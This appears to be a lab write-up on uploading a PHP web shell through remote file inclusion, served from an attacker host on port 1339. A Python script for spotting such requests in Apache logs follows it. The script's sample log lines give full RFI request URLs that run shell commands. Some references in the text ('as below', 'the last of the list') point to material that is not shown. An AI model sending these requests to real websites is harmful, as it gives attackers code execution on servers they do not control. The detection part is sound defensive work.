Web Shell with Remote File Inclusion (RFI)
Go to lab page:
The idea is to upload a web shell via RFI and execute it directly on the vulnerable website. In this case, I decided to use 'simple-backdoor.php'.
On the attacker machine (10.0.2.15) we can run a Python web server using:
python3 -m http.server 1339
and reach it by appending the file name and &cmd=command to IP:PORT, as below:
The correct answer is the last of the list: The plus symbol is the encoded character representing a space ' '. We have to encode the space character to prevent the Apache web server from thinking the space marks the end of the URL.
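Seen from the defender's side, a request of the shape described above stands out in the target's Apache access log: a query parameter whose value is a remote URL, next to a cmd parameter whose '+' decodes to a space. The following detection sketch is an added example, not part of the original writeup; the parameter name `page`, the path `/index.php` and the log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Request line inside an Apache access-log entry: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL is the RFI indicator
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_rfi(log_line):
    """Return (param, remote_url, decoded_cmd) for a suspected RFI request, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    query = m.group(1).partition("?")[2]
    # parse_qsl percent-decodes each value and turns '+' into a space,
    # so encoded and plain forms of the same request compare equal
    params = parse_qsl(query, keep_blank_values=True)
    cmd = next((v for k, v in params if k == "cmd"), None)
    for name, value in params:
        if REMOTE_URL_RE.match(value):
            return (name, value, cmd)
    return None

def scan(lines):
    """Return (line_number, finding) for every flagged line, numbering from 1."""
    hits = []
    for n, line in enumerate(lines, 1):
        finding = find_rfi(line)
        if finding:
            hits.append((n, finding))
    return hits

# Constructed sample log lines (not taken from the lab)
SAMPLE_LOG = [
    '10.0.2.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 812',
    '10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http://10.0.2.15:1339/simple-backdoor.php&cmd=ls+-la HTTP/1.1" 200 512',
    '10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=http%3A%2F%2F10.0.2.15%3A1339%2Fsimple-backdoor.php&cmd=ls%20-la HTTP/1.1" 200 512',
    '10.0.2.7 - - [01/Jan/2024:10:00:12 +0000] "GET /search.php?q=web+shell HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for line_no, (param, url, cmd) in scan(SAMPLE_LOG):
        print(f"line {line_no}: param={param!r} includes {url!r}, cmd={cmd!r}")
```

Because matching happens after decoding, the percent-encoded variant on the third sample line is flagged the same way as the plain one.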